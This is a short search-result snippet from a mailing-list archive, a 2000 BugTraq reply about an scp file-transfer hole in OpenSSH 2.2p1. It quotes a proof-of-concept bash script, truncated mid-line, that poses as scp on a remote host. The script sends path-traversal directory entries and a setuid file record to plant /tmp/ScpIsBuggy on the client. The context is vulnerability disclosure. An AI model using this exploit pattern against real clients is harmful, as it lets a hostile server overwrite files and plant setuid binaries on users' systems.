Displaying 1 result from an estimated 1 matches for "scpisbuggy".
2000 Oct 02
0
(from BugTraq) openssh2.2.p1 - Re: scp file transfer hole
...nt can spoof legitimate scp data,
> overwriting arbitrary files.
>
> As a proof of concept, I created trivial scp replacement (put it on remote
> machine in the place of original scp binary - usually in /usr/local/bin).
> It will try to exploit any file transfer, creating setuid /tmp/ScpIsBuggy
> file on client system:
>
> --
> #!/bin/bash
>
> echo "D0755 0 ../../../../../../tmp/nope"
> echo "D0755 0 ../../../../../../tmp"
> echo "C4755 200 ScpIsBuggy"
> dd if=/dev/urandom of=/dev/stdout bs=200 count=1 2>/dev/null
> dd if=/dev...